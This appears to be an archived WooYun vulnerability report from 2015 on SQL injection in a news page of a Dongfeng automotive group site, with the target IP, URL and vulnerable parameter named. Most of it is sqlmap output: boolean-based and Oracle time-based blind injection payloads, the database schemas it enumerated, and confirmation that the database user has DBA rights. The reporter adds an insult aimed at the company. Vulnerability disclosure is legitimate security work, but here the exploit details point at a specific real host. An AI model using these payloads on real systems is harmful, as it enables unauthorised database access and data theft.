乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-08: 细节已通知厂商并且等待厂商处理中 2015-09-13: 厂商已经主动忽略漏洞,细节向公众公开
中国二汽 东风集团 注入 dba or库 大量数据库
http://220.249.93.237/SCN/NewsDetail.aspx?ID=3509鄙视二汽集团 拿广大司机生命积累经验 by 二汽天龙驾驶者or库 没玩过 求能进zone
Parameter: ID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ID=3509 AND 1927=1927 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: ID=3509 AND 2889=DBMS_PIPE.RECEIVE_MESSAGE(CHR(79)||CHR(85)||CHR(12)||CHR(69),5)---[08:21:49] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Oracle[08:21:49] [WARNING] schema names are going to be used on Oracle for enumeratio as the counterpart to database names on other DBMSes[08:21:49] [INFO] fetching database (schema) names[08:21:49] [INFO] fetching number of databases[08:21:49] [INFO] resumed: 16[08:21:49] [INFO] resumed: CTXSYS[08:21:49] [INFO] resumed: JBPM[08:21:49] [INFO] resumed: MDSYS[08:21:49] [INFO] resumed: ODM[08:21:49] [INFO] resumed: ODM_MTR[08:21:49] [INFO] resumed: OLAPSYS[08:21:49] [INFO] resumed: ORDSYS[08:21:49] [INFO] resumed: OUTLN[08:21:49] [INFO] resumed: PERFSTAT[08:21:49] [INFO] resumed: RMAN[08:21:49] [INFO] resumed: SCOTT[08:21:49] [INFO] resumed: SYS[08:21:49] [INFO] resumed: SYSTEM[08:21:49] [INFO] resumed: WKSYS[08:21:49] [INFO] resumed: WMSYS[08:21:49] [INFO] resumed: XDBavailable databases [16]:[*] CTXSYS[*] JBPM[*] MDSYS[*] ODM[*] ODM_MTR[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] PERFSTAT[*] RMAN[*] SCOTT[*] SYS[*] SYSTEM[*] WKSYS[*] WMSYS[*] XDB
Parameter: ID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ID=3509 AND 1927=1927 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: ID=3509 AND 2889=DBMS_PIPE.RECEIVE_MESSAGE(CHR(79)||CHR(85)||CHR(102)||CHR(69),5)---[08:22:47] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Oracle[08:22:47] [INFO] testing if current user is DBAcurrent user is DBA: True
不会
危害等级:无影响厂商忽略
忽略时间:2015-09-13 11:28
漏洞Rank:2 (WooYun评价)
暂无